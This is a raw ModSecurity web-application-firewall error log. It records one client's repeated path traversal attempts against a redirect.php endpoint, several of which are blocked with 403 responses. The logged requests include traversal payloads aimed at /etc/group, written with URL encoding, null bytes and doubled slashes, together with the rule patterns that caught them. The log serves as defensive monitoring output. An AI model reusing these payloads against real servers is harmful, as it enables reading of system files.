[Tue May 12 05:06:13.598275 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.598320 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.598473 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.598520 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.598549 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.598576 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.598625 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.599139 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.599355 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UQAAAVA"]
[Tue May 12 05:06:13.695070 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UgAAAVA"]
[Tue May 12 05:06:13.695136 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UgAAAVA"]
[Tue May 12 05:06:13.695167 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UgAAAVA"]
[Tue May 12 05:06:13.695230 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UgAAAVA"]
[Tue May 12 05:06:13.695838 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UgAAAVA"]
[Tue May 12 05:06:13.696090 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68UgAAAVA"]
[Tue May 12 05:06:13.791471 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.791526 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.791707 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.791763 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.791797 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.791833 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.791887 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.792517 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.792789 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VAAAAVA"]
[Tue May 12 05:06:13.888538 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VgAAAVA"]
[Tue May 12 05:06:13.888611 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VgAAAVA"]
[Tue May 12 05:06:13.888651 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VgAAAVA"]
[Tue May 12 05:06:13.888706 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VgAAAVA"]
[Tue May 12 05:06:13.889371 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VgAAAVA"]
[Tue May 12 05:06:13.889630 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VgAAAVA"]
[Tue May 12 05:06:13.985314 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:13.985369 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
